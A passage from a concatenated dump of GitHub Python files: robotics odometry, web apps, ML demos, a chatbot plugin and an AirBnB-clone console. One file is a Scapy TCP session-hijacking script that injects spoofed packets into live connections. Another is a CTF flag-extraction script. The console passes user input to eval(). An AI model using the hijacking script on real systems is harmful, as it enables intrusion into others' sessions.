Y\n\t\t\tself.imuZ = Z\n\n\t\t\tself.angvelX = msg.angular_velocity.x\n\t\t\tself.angvelY = msg.angular_velocity.y\n\t\t\tself.angvelZ = msg.angular_velocity.z\n\n\t\t\tself.estimateTraj()\n\n\n\tdef estimateTraj(self):\n\t\tdt = float(self.timeDVL - self.previous_time)\n\t\tX = self.dvlX - self.OFFSET_X*(self.imuZ-self.lastImuZ)/dt\n\t\tY = self.dvlY - self.OFFSET_Y*(self.imuZ-self.lastImuZ)/dt\n\n\t\tself.estimated_traj_x = self.estimated_traj_x + (X * dt * math.cos(self.imuZ) - Y * dt * math.sin(self.imuZ))\n\t\tself.estimated_traj_y = self.estimated_traj_y + (X * dt * math.sin(self.imuZ) + Y * dt * math.cos(self.imuZ))\n\t\tself.estimated_traj_z = self.estimated_traj_z - self.dvlZ * dt\n\t\tself.previous_time = self.timeDVL\n\t\tself.lastImuX = self.imuX + self.STARTING_radianX\n\t\tself.lastImuY = self.imuY + self.STARTING_radianY\n\t\tself.lastImuZ = self.imuZ + self.STARTING_radianZ\n\n\t\tself.convert_to_odom()\n\n\tdef convert_to_odom(self):\n\n\t\todm = Odometry()\n\t\todm.header.seq = self.dvlseq\n\t\trostime = rospy.get_time()\n\t\todm.header.stamp.secs = int(rostime)\n\t\todm.header.stamp.nsecs = 1000000000*(rostime-int(rostime))\n\n\t\todm.header.frame_id = \"world\"\n\t\t#odm.child_frame_id = \"desistek_saga/base_link\"\n\n\t\todm.pose.pose.position.x = self.offset.x + self.estimated_traj_x #- rospy.get_time()/16\n\t\todm.pose.pose.position.y = self.offset.y + self.estimated_traj_y #- rospy.get_time()/16\n\t\todm.pose.pose.position.z = self.estimated_traj_z\n\n\t\todm.pose.pose.orientation.x = self.quaternionX\n\t\todm.pose.pose.orientation.y = self.quaternionY\n\t\todm.pose.pose.orientation.z = self.quaternionZ\n\t\todm.pose.pose.orientation.w = self.quaternionW\n\n\t\tself.pubOdom.publish(odm)\n\n\tdef quaternion_to_euler(self,x,y,z,w):\n\t\tt0 = +2.0 * (w * x + y * z)\n\t\tt1 = +1.0 - 2.0 * (x * x + y * y)\n\t\tX = math.degrees(math.atan2(t0, t1))\n\n\t\tt2 = +2.0 * (w * y - z * x)\n\t\tt2 = +1.0 if t2 > +1.0 else t2\n\t\tt2 = -1.0 if t2 < -1.0 else t2\n\t\tY = math.degrees(math.asin(t2))\n\n\t\tt3 = +2.0 * (w * z + x * y)\n\t\tt4 = +1.0 - 2.0 * (y * y + z * z)\n\t\tZ = math.atan2(t3, t4)\n\n\t\treturn X, Y, Z\n\ndef main(args):\n\n\trospy.init_node('read_dvl', anonymous=True)\n\n\ta = dvl()\n\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Shutting down\")\n\t\tcv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n","repo_name":"Tim-HW/HW-BlueRov2-Sonar-based-SLAM","sub_path":"src/robot init/dvl.py","file_name":"dvl.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"48"} +{"seq_id":"8589512794","text":"from __future__ import annotations\nfrom typing import Any, TypeVar, List, Set, Type, Optional, Callable, Union, Dict, Tuple\n\nfrom grapl_analyzerlib.node_types import (\n EdgeT,\n EdgeRelationship,\n PropType,\n)\nfrom grapl_analyzerlib.nodes.base import BaseView, BaseQuery, BaseSchema\nfrom grapl_analyzerlib.schema import Schema\nfrom grapl_analyzerlib.viewable import Viewable\n\nEQ = TypeVar(\"EQ\", bound=\"EntityQuery\")\nEV = TypeVar(\"EV\", bound=\"EntityView\")\n\n\ndef default_entity_edges():\n from grapl_analyzerlib.nodes.lens import LensSchema\n from grapl_analyzerlib.nodes.risk import RiskSchema\n\n return {\n \"in_scope\": (\n (\n EdgeT(EntitySchema, LensSchema, EdgeRelationship.ManyToMany),\n \"scope\",\n )\n ),\n \"risks\": (\n (\n EdgeT(EntitySchema, RiskSchema, EdgeRelationship.ManyToMany),\n \"risky_nodes\",\n )\n ),\n }\n\n\nclass EntitySchema(BaseSchema):\n def __init__(\n self,\n properties: \"Optional[Dict[str, PropType]]\" = None,\n edges: \"Optional[Dict[str, Tuple[EdgeT, str]]]\" = None,\n view: \"Union[Type[Viewable], Callable[[], Type[Viewable]]]\" = None,\n ):\n super(EntitySchema, self).__init__(\n properties={**(properties or {})},\n edges={\n **default_entity_edges(),\n **(edges or {}),\n },\n view=(view or EntityView),\n )\n\n @staticmethod\n def self_type() -> str:\n return \"Entity\"\n\n\nclass EntityQuery(BaseQuery[EV, EQ]):\n def with_lenses(self, *lenses: \"LensQuery\"):\n lenses = lenses or [LensQuery()]\n self.set_neighbor_filters(\"in_scope\", [lenses])\n for lens in lenses:\n lens.set_neighbor_filters(\"scope\", [self])\n return self\n\n def with_risks(self, *risks: \"RiskQuery\"):\n risks = risks or [RiskQuery()]\n self.set_neighbor_filters(\"risks\", [risks])\n for risk in risks:\n risk.set_neighbor_filters(\"risky_nodes\", [self])\n return self\n\n @classmethod\n def node_schema(cls) -> Schema:\n return EntitySchema({}, {}, None)\n\n\nclass EntityView(BaseView[EV, EQ]):\n queryable = EntityQuery\n\n def __init__(\n self,\n uid: int,\n node_key: str,\n graph_client: Any,\n node_types: Set[str],\n lenses: \"List[LensView]\" = None,\n **kwargs,\n ):\n super().__init__(uid, node_key, graph_client, node_types, **kwargs)\n self.node_types = set(node_types)\n self.uid = uid\n self.node_key = node_key\n self.graph_client = graph_client\n self.lenses = lenses or []\n\n def get_lenses(self, *lenses, cached=False) -> List[LensView]:\n return self.get_neighbor(LensQuery, \"in_scope\", \"scope\", lenses, cached) or []\n\n def get_risks(self, *risks, cached=False) -> List[RiskView]:\n return self.get_neighbor(RiskQuery, \"risks\", \"risky_nodes\", risks, cached) or []\n\n def into_view(self, v: Type[Viewable]) -> Optional[Viewable]:\n if v.node_schema().self_type() in self.node_types:\n self.queryable = v.queryable\n return v(\n self.uid,\n self.node_key,\n self.graph_client,\n node_types=self.node_types,\n **self.predicates,\n )\n return None\n\n @classmethod\n def node_schema(cls) -> Schema:\n return EntitySchema({}, {}, EntityView)\n\n\nfrom grapl_analyzerlib.nodes.lens import LensQuery, LensView\nfrom grapl_analyzerlib.nodes.risk import RiskQuery, RiskView\n","repo_name":"macasieb/grapl","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/nodes/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"12445159733","text":"#coding=utf-8;\n\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nimport os\n\n# 设置配置\nsettings = dict(\n template_path = os.path.join(os.path.dirname(__file__),\"template\"),\n static_path = os.path.join(os.path.dirname(__file__),\"static\")\n)\n\n# 渲染首页的模板\nclass HomeHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.render(\"home.html\");\n\n# 渲染登录的模板\nclass LoginHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.render(\"login.html\");\n\n# app 的编写\napp = tornado.web.Application(handlers=[(r\"/home\",HomeHandler),\n\n (r\"/login\",LoginHandler)\n ], **settings);\n\n\n# main 函数\nif __name__ == '__main__':\n http_server = tornado.httpserver.HTTPServer(app);\n http_server.listen(8080);\n tornado.ioloop.IOLoop.instance().start();\n","repo_name":"AlexanderYeah/SKMoreWorkSpace","sub_path":"Day1/SKMallDemo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70073103827","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport streamlit as st\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn.ensemble import RandomForestRegressor\nimport pickle\n\n\nst.write(\"\"\"\n# Boston House Price Prediction App\nThis app predicts the **Boston House Price**!\n\"\"\")\nst.write('---')\n\n# Loads the Boston House Price Dataset\nboston = datasets.load_boston()\nX = pd.DataFrame(boston.data, columns=boston.feature_names)\nY = pd.DataFrame(boston.target, columns=[\"MEDV\"])\n\n# Sidebar\n# Header of Specify Input Parameters\nst.sidebar.header('Specify Input Parameters')\n\ndef user_input_features():\n CRIM = st.sidebar.slider('CRIM', X.CRIM.min(), X.CRIM.max(), X.CRIM.mean())\n ZN = st.sidebar.slider('ZN', X.ZN.min(), X.ZN.max(), X.ZN.mean())\n INDUS = st.sidebar.slider('INDUS', X.INDUS.min(), X.INDUS.max(), X.INDUS.mean())\n CHAS = st.sidebar.slider('CHAS', X.CHAS.min(), X.CHAS.max(), X.CHAS.mean())\n NOX = st.sidebar.slider('NOX', X.NOX.min(), X.NOX.max(), X.NOX.mean())\n RM = st.sidebar.slider('RM', X.RM.min(), X.RM.max(), X.RM.mean())\n AGE = st.sidebar.slider('AGE', X.AGE.min(), X.AGE.max(), X.AGE.mean())\n DIS = st.sidebar.slider('DIS', X.DIS.min(), X.DIS.max(), X.DIS.mean())\n RAD = st.sidebar.slider('RAD', X.RAD.min(), X.RAD.max(), X.RAD.mean())\n TAX = st.sidebar.slider('TAX', X.TAX.min(), X.TAX.max(), X.TAX.mean())\n PTRATIO = st.sidebar.slider('PTRATIO', X.PTRATIO.min(), X.PTRATIO.max(), X.PTRATIO.mean())\n B = st.sidebar.slider('B', X.B.min(), X.B.max(), X.B.mean())\n LSTAT = st.sidebar.slider('LSTAT', X.LSTAT.min(), X.LSTAT.max(), X.LSTAT.mean())\n data = {'CRIM': CRIM,\n 'ZN': ZN,\n 'INDUS': INDUS,\n 'CHAS': CHAS,\n 'NOX': NOX,\n 'RM': RM,\n 'AGE': AGE,\n 'DIS': DIS,\n 'RAD': RAD,\n 'TAX': TAX,\n 'PTRATIO': PTRATIO,\n 'B': B,\n 'LSTAT': LSTAT}\n features = pd.DataFrame(data, index=[0])\n return features\n\ndf = user_input_features()\n\n# Main Panel\n\n# Print specified input parameters\nst.header('Specified Input parameters')\nst.write(df)\nst.write('---')\n\n# Build Regression Model\nmodel = RandomForestRegressor()\nmodel.fit(X, Y)\npickle.dump(model, open('boston.pkl', 'wb'))\n\n\n# Reads in saved classification model\nload_clf = pickle.load(open('boston.pkl', 'rb'))\n# Apply Model to Make Prediction\n\n\n# Apply model to make predictions\nprediction = load_clf.predict(df)\n\n\n\n\n","repo_name":"csezia/TestShop","sub_path":"app_run.py","file_name":"app_run.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9950827647","text":"#!/usr/bin/env python\nimport subprocess\n\nflag = ''\n\nfor id in range(0, 45):\n command = ('curl -i http://104.199.235.135:31331/index.php?p=' + str(id))\n content = subprocess.check_output(command, shell=True)\n flag += content[content.find('Content-Length')-3]\n \nprint(flag)\n","repo_name":"wy56/CTF-Write-Up","sub_path":"2018-ais3-pre-exam/web1/web1.py","file_name":"web1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70846677265","text":"from collections import deque\nimport sys\n# input = sys.stdin.readline\n\ndeq = deque()\nn = int(input())\nfor _ in range(n):\n 입력 = input()\n if 입력[0:4] == 'push':\n order, num = 입력.split()\n deq.append(num)\n elif 입력 == 'pop':\n if deq:\n print(deq.popleft())\n else:\n print(-1)\n elif 입력 == 'size':\n print(len(deq))\n elif 입력 == 'empty':\n if deq:\n print(0)\n else:\n print(1)\n elif 입력 == 'front':\n if deq:\n print(deq[0])\n else:\n print(-1)\n elif 입력 == 'back':\n if deq:\n print(deq[-1])\n else:\n print(-1)","repo_name":"hvvany/TIL","sub_path":"Algorithm/Baekjoon/code_folder/10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"31415028907","text":"from torch.utils.data.dataset import Dataset\nimport os\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nimport numpy as np\nimport traceback\nfrom IPython.display import display, clear_output\nimport config\nfrom torch.autograd import Variable\n\n\n##\n## Custom class for loading data\n##\nclass MyCustomDataset(Dataset):\n def __init__(self, percent, direc, transform,args):\n self.data_root = direc\n self.args=args\n self.transform = transform\n if (os.path.exists((os.path.join(self.data_root, '/labels')))):\n self.names = np.array([name for name in os.listdir((os.path.join(self.data_root, '/labels'+name)))])\n else: self.names = np.array([name for name in os.listdir(self.data_root)])\n if percent<0:self.names = self.names[0:-1*percent]\n else: self.names = self.names[0:int(percent*len(self.names)//100)]\n self.count = len(self.names)\n\n\n def __getitem__(self, index):\n name = self.names[index]\n rayed = torch.Tensor()\n if (os.path.exists((os.path.join(self.data_root, '/labels')))):\n img = Image.open((os.path.join(self.data_root, '/images/'+name)))\n rayed = Image.open((os.path.join(self.data_root, '/labels/'+name)))\n else:\n if(self.args.setup==4 or self.args.setup==5):\n img = Image.fromarray(np.load((os.path.join(self.data_root, name))))\n else:\n img = Image.open((os.path.join(self.data_root, name)))\n img = self.transform(img)\n # img = (img-img.min())/(img.max()-img.min())\n return (rayed, img)\n\n def __len__(self):\n return self.count\n\n\n##\n## Loading data for training/testing\n##\ndef load_data(args,test=False):\n data_train_loader, data_valid_loader, data_test_loader = [],[],[]\n if (not test):\n data_train = MyCustomDataset(args.dataperc,args.data_path+'/train', transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_train_loader = DataLoader(data_train, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, drop_last=False)\n\n\n data_valid = MyCustomDataset(-args.valid,args.data_path+'/valid',transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_valid_loader = DataLoader(data_valid, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, drop_last=False)\n if (test):\n data_test = MyCustomDataset(args.dataperc,args.data_path+'/test', transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_test_loader = DataLoader(data_test, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, drop_last=False)\n\n return (data_train_loader, data_valid_loader, data_test_loader)\n\n\n##\n## Creating noisy version/scans after Radon from the truth\n##\ndef create(truths, mean):\n if(config.angles != 0):rayed = config.fwd_op_mod(truths)\n else: rayed=truths.clone()\n\n rayed += Variable(config.noise * mean * torch.randn(rayed.shape)).type_as(rayed)\n return rayed\n","repo_name":"Zakobian/CT_framework_","sub_path":"data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"26587867090","text":"from errbot import BotPlugin, botcmd, arg_botcmd, webhook\n\nimport evelink.api\n\nclass Contractor(BotPlugin):\n \"\"\"\n hack the planet\n \"\"\"\n \n def do_contract_update(self):\n self.log.info('CONTRACT UPDATING WILL GO HERE')\n\n def activate(self):\n \"\"\"\n Triggers on plugin activation\n \"\"\"\n self.log.info('Activating Contractor Plugin.')\n \n super(Contractor, self).activate()\n if not \"API_KEYS\" in self:\n self[\"API_KEYS\"] = {}\n if not \"CONTRACTS\" in self:\n self[\"CONTRACTS\"] = {}\n self.log.info('Starting contract poller.')\n \n self.start_poller(15*60, self.do_contract_update)\n \n @arg_botcmd('v_code', type=str)\n @arg_botcmd('key_id', type=int)\n def api_add(self, message, key_id, v_code):\n \"\"\"Add an api key to the contractor bot.\"\"\"\n return self.add_api_key(key_id, v_code)\n \n @botcmd\n def api_list(self, message, args):\n api_keys = self[\"API_KEYS\"]\n yield \"The following keys are being watched:\"\n for key_id in api_keys:\n yield key_id\n\n @arg_botcmd('key_id', type=int)\n def api_del(self, message, key_id):\n api_keys = self[\"API_KEYS\"]\n if key_id in api_keys:\n del api_keys[key_id]\n self[\"API_KEYS\"] = api_keys\n return \"Removed key with id {0}\".format(key_id)\n else:\n return \"There is no such key with id {0}\".format(key_id)\n \n def add_api_key(self, key_id, v_code):\n api_keys = self[\"API_KEYS\"]\n if key_id in api_keys:\n return \"The key with id {0} is already saved\".format(key_id)\n else:\n api = evelink.api.API(api_key=(key_id, v_code))\n request = evelink.account.Account(api=api).key_info()\n result = request.result\n type = result['type']\n \n api_keys[key_id] = dict(key=(key_id, v_code), type=type)\n self[\"API_KEYS\"] = api_keys\n self.log.info(\"Saved API key with id {0}.\".format(key_id))\n # self.refresh_contracts_for_api(api_keys])\n if type == 'char' or type == 'account':\n characters = []\n for character_id, character_info in result['characters'].items():\n characters.append(character_info['name'])\n names = \", \".join(characters)\n return \"Added {} key (characters: {}) with id {} and expiry {}\".format(result['type'], names, key_id, result['expire_ts'])\n else:\n return \"Added {} key with id {} and expiry {}\".format(result['type'], key_id, result['expire_ts'])\n \n def refresh_contracts_for_api(self, api_info):\n saved_contracts = self[\"CONTRACTS\"]\n api = evelink.api.API(api_key=api_info['key'])\n \n self.log.info(\"Refreshing api key ({!s}, {})\", api_info['key'][0], api_info['key'][1])\n key_info = evelink.account.Account(api=api).key_info().result\n \n for character_id in key_info['characters']:\n char = evelink.char.Char(char_id=character_id, api=api)\n contracts_result = char.contracts().result\n \n for contract_id, contract_info in contracts_result.items():\n self.log.info(\"Contract {!s}: {}\".format(contract_id, contract_info))\n if contract_id in saved_contracts:\n prev_contract_info = saved_contracts[contract_id]\n if prev_contract_info['status'] != contract_info['status']:\n self.log.info(\"Contract {0!s} changed state from {} to {}\".format(contract_id, prev_contract_info['status'], contract_info['status']))\n saved_contracts[contract_id] = contracts_info\n self[\"CONTRACTS\"] = saved_contracts\n elif contract_info['status'] == 'Outstanding':\n self.log.info(\"New contract {!s} discovered.\".format(contract_id))\n saved_contracts[contract_id] = contract_info\n self[\"CONTRACTS\"] = saved_contracts\n","repo_name":"ministry-of-love/contractor","sub_path":"contractor.py","file_name":"contractor.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74069427985","text":"import numpy as np\nclass LogSeries:\n def __init__(self, a0):\n self.a0 = a0\n\n def __call__(self, t):\n assert(t > 0)\n return self.a0 + np.log(t)\n\nif __name__ == \"__main__\":\n a0 = 0.1\n a = LogSeries(a0)\n print(a(1))\n print(a(2))\n print(a(3))\n print(a(100))\n print(a(1000))\n","repo_name":"omron-sinicx/action-constrained-RL-benchmark","sub_path":"action_constrained_rl/utils/log_series.py","file_name":"log_series.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"2199331793","text":"import webbrowser\n\nimport pygame\n\n\"\"\"Main setup\"\"\"\nFPS = 60\nwindow_title = 'Polo'\nscreen_resolution = (800, 600)\nscreen_mode = pygame.FULLSCREEN\nlevel_path = r\"/Levels/\"\n\n\"\"\"Fonts and Language\"\"\"\nlanguage = 0\npygame.font.init()\nsize = 16\nmessage_line_length = 70\nfont_location = \"Source/Fonts/\"\norson_location = font_location + \"SFOrson/\"\nsilver_location = font_location + \"SilverAge/\"\nghost_location = font_location + \"Ghost/\"\nfont_medium = pygame.font.Font(orson_location + \"SFOrsonCasualMedium.ttf\", size)\nfont_heavy = pygame.font.Font(orson_location + \"SFOrsonCasualHeavy.ttf\", int(1.5 * size))\nfont_shaded = pygame.font.Font(orson_location + \"SFOrsonCasualShaded.ttf\", 2 * size)\nfont_message_text = pygame.font.Font(ghost_location + \"T-FLEXTypeB.ttf\", int(1.6 * size))\n\n\"\"\"User\"\"\"\nuser_config_file = \"cfg\"\n\n\ndef about():\n out_about = \"Polo \\n\" \\\n \"Created by Zhufyak V.V. \\n\" \\\n \"Music by Baglay R. I.\" \\\n \"Special thanks: \\n\" \\\n \"Baglay Roman \\n\" \\\n \"Kappa\"\n git_link = \"https://github.com/zhufyakvv/Polo\"\n print(out_about)\n webbrowser.open(url=git_link)\n","repo_name":"vzhufk/Polo","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1780208133","text":"from scapy.all import *\n\nprint(\"-\"*50)\nprint(\"-\"*10,\"TCP Session Hijacking Attack\",\"-\"*10)\nprint(\"-\"*50)\n\nsrc_ip = input('Source IP Address: ')\ndst_ip = input('Destination IP Address: ')\nsrc_port = int(input('Source Port: '))\ndst_port = int(input('Destination Port: '))\nseq_num = int(input('Sequence Number (raw): '))\nack_num = int(input('Acknowledgment number (raw): '))\ndata = input('Message: ')\n\nprint(\"Sending Session Hijacking Packet.......\")\n\nIPLayer = IP(src=src_ip,dst=dst_ip)\nTCPLayer = TCP(sport=src_port, dport=dst_port, flags=0x018,seq=seq_num, ack=ack_num)\npkt = IPLayer/TCPLayer/str(data)\nsend(pkt,verbose=0)\n","repo_name":"ahictf/TCP-Session-Hijacking-Attack","sub_path":"tcp_session_hijacking.py","file_name":"tcp_session_hijacking.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5306790119","text":"from itertools import permutations\r\ni=input().split()\r\ns=i[0]\r\nintt=int(i[1])\r\nli1=list(permutations(s,intt))\r\nli=sorted(li1)\r\nfor x in li:\r\n for y in x:\r\n print(y,end=\"\")\r\n print(sep=\" \")\r\n\r\n","repo_name":"Dineshanth123/hackkerrank","sub_path":"itertools permutations.py","file_name":"itertools permutations.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73991309264","text":"#Problem:\n#1. Create Bandit with different wining rate\n#2. Experiment code to explore and exploit\n\n#EpsilonGreedy :\n# Gerenate random number x from 0-1\n# if x is less the epsilon:\n# select a random bandit (index = random....)\n# else:\n# select the Bandit with maximun reward index = max(bandit)\n# exploit the bandit[index]\n# update the reward rate of bandit[index]\n\n\nimport random\n\nwiningRate = [0.2 , 0.3 , 0.5, 0.8];\nnumberOfTrail = 1000;\n\nclass Bandit:\n def __init__(this,winingRate):\n this.winingRate = winingRate;\n this.numberOfBandit = len(winingRate)\n\n def pull(this,i):\n x = random.random()\n if x <= this.winingRate[i]:\n return 1\n else:\n return 0\n\nbandit = Bandit(winingRate)\nreward = 0\n\nsampleRate = [0]*bandit.numberOfBandit\nnoOfSample = [0]*bandit.numberOfBandit\nepsilon = 0.1\n\ndef calSampleMean(i, sample):\n n = noOfSample[i]\n prevMean = sampleRate[i]\n newMean = (prevMean * n + sample)/(n+1)\n return newMean\n\n\n\n\nfor i in range(numberOfTrail):\n x=random.random()\n if x 1:\n if list_args[0] not in list_class:\n print(\"** class doesn't exist **\")\n return\n\n show = re.match(\"show(.*)\", list_args[1])\n destroy = re.match(\"destroy(.*)\", list_args[1])\n update = re.match(\"update(.*)\", list_args[1])\n objects = models.storage.all()\n\n if list_args[1] == \"all()\": # 11..all()\n self.do_all(list_args[0])\n elif list_args[1] == \"count()\": # 11..count()\n count = 0\n for key, value in objects.items():\n if value.to_dict()[\"__class__\"] == list_args[0]:\n count += 1\n print(count)\n elif show and len(list_args[1]) == show.end(): # 12..show(id)\n id_obj = list_args[1][6: -2]\n key = list_args[0] + \".\" + id_obj\n\n if key in objects:\n print(objects[key])\n else:\n print(\"** no instance found **\")\n elif destroy and len(list_args[1]) == destroy.end(): # 13..de\n id_obj = list_args[1][9: -2]\n key = list_args[0] + \".\" + id_obj\n\n if key in objects:\n args = list_args[0] + \" \" + id_obj\n self.do_destroy(args)\n else:\n print(\"** no instance found **\")\n elif update and len(list_args[1]) == update.end(): # 14..up\n args_init = list_args[1][7: -1]\n args_check_update_dict = re.match('\".*\", {.*}', args_init)\n if not args_check_update_dict: # 14..up\n args_not_comma = args_init.replace(\",\", \"\")\n args = list_args[0] + \" \" + args_not_comma\n self.do_update(args)\n else:\n list_args_for_dict = args_init.split(\",\")\n key = list_args[0] + \".\" + list_args_for_dict[0][1: -1]\n if key in objects:\n mydict_incomplete = args_init.split(\"{\")\n mydict_final = \"{\" + mydict_incomplete[1]\n dict_atributtes = eval(mydict_final)\n dict_atributtes.update(objects[key].to_dict())\n new_obj = eval(list_args[0])(**dict_atributtes)\n objects[key] = new_obj\n models.storage.save()\n else:\n print(\"** no instance found **\")\n\n def do_quit(self, args):\n 'Quit command to exit the program\\n'\n return True\n\n def do_EOF(self, line):\n 'EOF command (ctrl + d) to exit the program\\n'\n return True\n\n def do_create(self, args):\n \"\"\"Creates a new instance of BaseModel, saves it (to the JSON file)\n and prints the id\n \"\"\"\n args_list = args.split()\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n else:\n try:\n new_object = eval(args_list[0])()\n new_object.save()\n print(new_object.id)\n except:\n print(\"** class doesn't exist **\")\n\n def do_show(self, args):\n \"\"\"Prints the string representation of an instance based on the class\n name and id\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n elif len(args_list) == 1:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n if len(args_list) == 1:\n print(\"** instance id missing **\")\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects:\n print(\"** no instance found **\")\n else:\n print(all_objects[id_to_check])\n\n def do_destroy(self, args):\n \"\"\" Deletes an instance based on the class name and id (save the change\n into the JSON file).\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n elif len(args_list) == 1:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n if len(args_list) == 1:\n print(\"** instance id missing **\")\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects:\n print(\"** no instance found **\")\n else:\n del all_objects[id_to_check]\n models.storage.save()\n\n def do_all(self, args):\n \"\"\" Prints all string representation of all instances based or not on\n the class name.\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n all_objects = models.storage.all()\n list_of_print = []\n\n if len(args_list) == 0:\n for key, value in all_objects.items():\n list_of_print.append(value.__str__())\n print(list_of_print)\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n for key, value in all_objects.items():\n if value.to_dict()[\"__class__\"] == args_list[0]:\n list_of_print.append(value.__str__())\n print(list_of_print)\n\n def do_update(self, args):\n \"\"\"Updates an instance based on the class name and id by adding or\n updating attribute (save the change into the JSON file).\n \"\"\"\n\n args_list = shlex.split(args)\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n if len(args_list) == 0: # $Update\n print(\"** class name missing **\")\n elif len(args_list) == 1: # 1.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else: # $ update BaseModel\n print(\"** instance id missing **\")\n elif len(args_list) == 2: # 2.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n print(\"** attribute name missing **\")\n elif len(args_list) == 3: # 3.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121212\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n print(\"** value missing **\") # $ update BaseModel id\n else: # 4.\"\"\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121212\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n value_temp = args_list[3]\n\n try:\n if \".\" in value_temp: # chrek if is posible float\n value = float(value_temp)\n else:\n value = int(value_temp) # check if is posible int\n except:\n value = value_temp # assign value how string\n\n setattr(all_objects[id_to_check], args_list[2], value)\n models.storage.save()\n\nif __name__ == \"__main__\":\n mycmd = HBNBCommand()\n mycmd.cmdloop()\n","repo_name":"Diegokernel/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1252637259","text":"import sys\r\nimport time\r\nimport datetime\r\nimport os\r\n\r\n# Google Tasks API\r\nfrom google.cloud import tasks_v2\r\nfrom google.protobuf import timestamp_pb2\r\nimport json\r\nimport base64\r\n\r\n# Import the Secret Manager client library.\r\nfrom google.cloud import secretmanager\r\n\r\n# Selenium essentials\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by 